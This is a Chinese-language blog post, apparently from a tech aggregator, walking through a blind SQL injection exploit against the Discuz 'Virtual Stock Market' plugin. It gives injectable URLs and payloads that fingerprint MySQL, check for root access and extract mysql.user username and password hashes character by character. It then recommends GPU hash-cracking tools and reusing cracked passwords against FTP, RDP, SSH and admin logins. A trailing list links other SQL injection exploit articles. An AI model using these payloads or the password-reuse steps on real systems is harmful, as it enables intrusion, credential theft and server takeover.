Discuz插件《虚拟股市》blind Injection注入漏洞利用
http://www.target.com/plugin.php ... _One&stockid=91 # 91为可变参数
http://www.target.com/plugin.php ... ser_Show&uid=13 # 13为可变参数
1.尝试盲注
2.通过阅读《虚拟股市》这个插件的源码来确认其表结构和字段数
#判断MYSQL版本,返回正常则为5,返回不正常则继续测试是否为4
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and substring(@@version,1,1)=5
#是否支持子查询(版本为4的情况下)
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and (select 1)=1
#当前用户是否为root
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and (select 1 from mysql.user limit 0,1)=1
1. 假如数据库用户为root,则可以直接取出root密码HASH,然后破解。如果对方服务器3306开放,或者装有phpmyadmin,那么下一步不用说相信大家也知道了。如果没有开放3306,也没有安装phpmyadmin,那么可以用破解出来的密码猜测一下ftp密码,3389密码,或者SSH密码,又或者后台管理员密码,等等。
2.假如数据库用户不为root,则直接取出discuz用户表cdb_members的管理员密码HASH,然后破解。
#mysql.user表第一行第一个字符的ASCII值是否大于80
and ascii(substring((SELECT concat(username,0x3a,password) from mysql.user limit 0,1),1,1))>80
#第二个字符的ASCII值是否大于90
and ascii(substring((SELECT concat(username,0x3a,password) from mysql.user limit 0,1),2,1))>90
…………
1.MYSQL版本为4的话,这里有工具www.sqlhack.com,这个工具利用的是一个传说中的BUG,速度爆快。
2.MYSQL 版本为5的话,我推荐用ighashgpu进行破解(貌似只用GPU,不用CPU),我AMD4核+HD 4650显卡,破解速度为60M/s,放到Inter Core i7 8核 + NVIDIA GeForce 9800GTX+平台上,速度是70M/s。而用passwordpro,速度才170w/s,这就是差距。7位纯字母我只用了7分多钟就破出来了。
1.《Full SQL Injection Tutorial (MySQL)》
2. 伟大的google
Discuz插件《虚拟股市》blind Injection注入漏洞利用相关推荐
- Discuz 7.2 /faq.php SQL注入漏洞
测试方法: 提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! Discuz 7.2 /faq.php SQL注入漏洞 http://www.xxx.com/faq.php?actio ...
- Discuz!uc.key泄露导致代码注入漏洞uc.php的解决方法
漏洞名称:Discuz uc.key泄露导致代码注入漏洞 漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可 ...
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- SQL注入——SQL注入漏洞利用(零)(值得收藏)
一.什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系 统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后 台数据库 ...
- 命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令.当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数. 比如PHP中的system,e ...
- discuz 7.2 /faq.php sql注入漏洞,Python写的Discuz7.2版faq.php注入漏洞工具
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin ...
- mysql limit sql注入_LIMIT子句中的盲 SQL注入漏洞利用
原文:https://www.noob.ninja/2019/07/exploiting-tricky-blind-sql-injection.html 前言 嘿!有好长时间没有更新过博客了,不知道大 ...
- 动网论坛8.2经典注入漏洞利用
一.实验目的 理解动网论坛8.2原理 二.实验原理 动网论坛用户登录过程中,过滤不严,导致注入,提升权限.漏洞存在源文件的login.asp中. 三.实验环境 本机:192.168.1.2 目标机:1 ...
最新文章
- Linux0.11内核引导启动过程概述
- csgo怎么通过人机验证_让你的MacBook Pro完美运行CSGO!(图解版)
- Troubleshooting Open Cursor Issues
- mosn 中的context、变量 和 内存复用机制
- 【LeetCode】3. Longest Substring Without Repeating Characters
- 复习深入笔记02:魔法方法/cookie,session,token/异常
- SQLServer之创建非聚集索引 1
- 信息奥赛一本通(1231:最小新整数)
- css 实现16:9比例自适应手机尺寸,可设置任意比例
- Google 究竟是不是要用 Fuchsia OS 取代 Android?
- [转载]IEEE754标准的浮点数表示
- 央妈:银联,想说爱你不容易
- 最佳eclipse字体推荐(个人认为)
- uni-app横屏设置
- GUI学习笔记——04更改背景板颜色,鼠标进入事件
- windows phone的那些应用们 有意思的,good design的,有用的...
- 燃尽图 (Burn up and Burn down Chart)—介绍
- 日历控件(bootstrap-datetimepicker.js)
- startwith的使用方法
- Oracle EBS财务模块(三)总账功能